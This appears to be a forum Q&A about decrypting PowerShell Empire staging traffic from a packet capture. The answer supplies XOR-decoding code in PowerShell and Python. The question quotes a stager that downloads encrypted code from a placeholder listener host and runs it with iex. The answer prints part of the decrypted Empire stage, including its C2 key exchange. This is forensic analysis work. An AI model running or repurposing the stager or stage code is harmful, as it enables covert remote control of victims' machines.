2016-07-23 99 views
0

Decrypting PowerShell Empire

I'm working on a project where I want to take two things, the PowerShell command from a stager and a pcap of the communication, and decode the command-and-control stream.

This involves https://github.com/PowerShellEmpire/Empire

The Base64-decoded PowerShell command is as follows:

'$wc=new-object system.net.webclient;$u=\'USERAGENT\';$wc.headers.add(\'user-agent\',$u);$wc.proxy = [system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials = [system.net.credentialcache]::defaultnetworkcredentials;$k=\'SECRETKEY\';$i=0;[char[]]$b=([char[]]($wc.downloadstring("http://IPOFLISTENER/index.asp")))|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')'

https://github.com/PowerShellEmpire/Empire/wiki/Staging

The wiki says that the payload pulled from 'index.asp' is XOR-encrypted with the staging key. So given that I have this stager and the key, how do I recover the plaintext?

Here is what I have so far:

tshark -nr ~/Desktop/stager.pcap -Y "ip.id == 0x7ba9" -T fields -e data

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 

This is the payload of the response for index.asp, in hex.

The staging key is: ~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n(

In particular, I need to understand this part:

|%{$_-bxor$k[$i++%$k.length]};iex ($b-join\'\')' 

I know that $_ is the value coming in through the pipeline and that -bxor XORs it with the key, $k. I don't know what the rest does.

+0

Usually the key is not ASCII but bytes. Don't you know the protocol?

Answer

0

You need to convert both strings into a common format. Let's start with the key.

Assuming that ~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n( is simply the key, ASCII-encoded, we can convert it back into a byte array like this:

# convert key string to [byte[]] 
$keyString = '~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n('
$key  = [System.Text.Encoding]::ASCII.GetBytes($keyString) 

The encrypted payload from tshark appears to be hex-encoded. Fortunately, a hex string is quite simple to convert, since each pair of characters represents one byte:

# get ready to convert the encrypted stager payload from hex to [byte[]] 
$payloadHex = "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" 
$payloadHexCount = $payloadHex.Length 

# create new [byte[]] for actual payload 
$payload = ,0 * ($payloadHexCount/2) 

for($i=0; $i -lt $payloadHexCount; $i+=2) 
{ 
    # convert each char pair to bytes 
    $payload[$i/2] = [System.Convert]::ToByte($payloadHex.Substring($i, 2), 16) 
} 

Then, finally, we just need to XOR the two:

# XOR the two byte arrays and concatenate the resulting bytes as char's 
$decryptedString = "" 
for ($i = 0; $i -lt $payload.Count; $i++){ 
    $decryptedString += [char]($payload[$i] -bxor $key[$i % $key.Length]) 
} 

Tada! The decrypted payload:

PS C:\> $decryptedString 
FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")ADD-TYpe -ASsEMbly SysTem.SeCUrITy;AdD-TYPe -aSsEmBLY SYSTeM.CoRE;$ErrorActionPreference = "SilentlyContinue";$e=[SYSTem.TeXT.EncOdING]::ASCII;$AES=NEw-OBJeCt SYSteM.SeCuRITY.CrYptOGRaphY.AesCRYpTOSErVicePrOVIdER;$IV = [bYte] 0..255 | GEt-RANdoM -counT 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($SK); $AES.IV = $IV;$cSP = New-OBject SYStEM.SEcURity.CrYptOgrAphY.CsPPaRamEtErS;$cSP.FlaGs = $CSp.FLAgs -BOR [System.SecuRITy.CRyPTOGraPHY.CspPROvIdErFlAGs]::USeMACHInEKEyStore;$rS = NEw-OBjECT SYsTem.SeCURITY.CRyptOgRAPHy.RSACryptoSERVICEProvIDER -ARgUmentLIST 2048,$cSP;$Rk=$rs.ToXMLStRINg($FaLSe);$r=1..16|FOrEaCH-OBjEct{Get-RandoM -max 26};$ID=('ABCDEFGHKLMNPRSTUVWXYZ123456789'[$R] -JOin '');$ib=$E.GEtbytES($rk);$eb=$IV+$AES.CReaTEENcryPTOr().TRAnsformFINalBLOCk($Ib,0,$ib.LengTh);IF(-not $wc){$wC=New-ObJeCT SYstEm.NeT.WEbCLiENT;$Wc.PROxy = [System.NEt.WEbReQueST]::GETSYSTemWEbPRoXy();$WC.ProxY.CredenTIAlS = [SysTeM.NET.CreDEntiAlCacHe]::DEFauLTCrEDEnTIaLS;}$wc.Headers.Add("User-Agent",$UA);$wc.Headers.Add("Cookie","SESSIONID=$ID");$raw=$wc.UploadData($s+"index.jsp","POST",$eb);$DE=$e.GetStrING($RS.decrYPT($RAw,$fALSE));$EpoCh=$de[0..9] -joIN'';$KeY=$De[10..$DE.LengTh] -jOiN '';$AES=NEW-OBjEcT SystEM.SEcUrItY.CryPToGrAphy.AesCrypToSeRvICePROviDer;$IV = [byTE] 0..255 | GET-RANdoM -COUnt 16;$AES.Mode="CBC"; $AES.Key=$e.GetBytes($key);
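The same recovery step, written as an added Python example rather than the answer's PowerShell: it hex-decodes the bytes tshark printed for the index.asp response, applies repeating-key XOR (byte i against key[i % len(key)], which is exactly what the stager's |%{$_ -bxor $k[$i++ % $k.length]} does one element at a time), and returns the text as the stager would see it. Because the captured payload itself is omitted on this page, the block constructs its own sample by encrypting a short plaintext with the key and then decrypting it; the key string is the one from the question, and the printable_ratio helper is an assumption of mine for sanity-checking a candidate key (the comment above is right that the key may be raw bytes, so the helpers accept either a str or bytes).

```python
import binascii
import string

# Staging key as given in the question (32 ASCII characters).
STAGING_KEY = "~8yK6]*0N3d&|cZGLm)X_15@S`C#j:n("


def key_bytes(key) -> bytes:
    """Accept the key as an ASCII string (as on the page) or as raw bytes."""
    return key if isinstance(key, bytes) else key.encode("ascii")


def xor_repeating(data: bytes, key) -> bytes:
    """Repeating-key XOR: byte i of data is XORed with key[i % len(key)].
    XOR is its own inverse, so the same call encrypts and decrypts."""
    k = key_bytes(key)
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def decode_stage(hex_payload: str, key) -> str:
    """Hex-decode the bytes printed by `tshark -T fields -e data` (with or
    without ':' separators), XOR with the staging key, and return one char
    per byte, matching the stager's [char[]] cast."""
    raw = binascii.unhexlify(hex_payload.strip().replace(":", ""))
    return xor_repeating(raw, key).decode("latin-1")


def printable_ratio(text: str) -> float:
    """Fraction of printable characters. A correct key yields script text
    (ratio close to 1.0); a wrong key yields mostly non-printable bytes."""
    if not text:
        return 0.0
    return sum(ch in string.printable for ch in text) / len(text)


# Constructed sample: the captured payload is not on the page, so a short
# plaintext (the start of the decrypted output shown in the answer) is
# encrypted here with the key to stand in for tshark's hex output.
SAMPLE_PLAINTEXT = 'FunctION STart-NEGoTIaTe{param($s,$SK,$UA="lol")'
SAMPLE_HEX = xor_repeating(SAMPLE_PLAINTEXT.encode("latin-1"), STAGING_KEY).hex()

if __name__ == "__main__":
    recovered = decode_stage(SAMPLE_HEX, STAGING_KEY)
    print(f"printable ratio: {printable_ratio(recovered):.2f}")
    print(recovered)
```

When working from a real capture, paste the hex that tshark printed in place of SAMPLE_HEX; if the printable ratio comes out low, the key string or its encoding is wrong, which is the quickest way to confirm the ASCII-versus-bytes question raised in the comment.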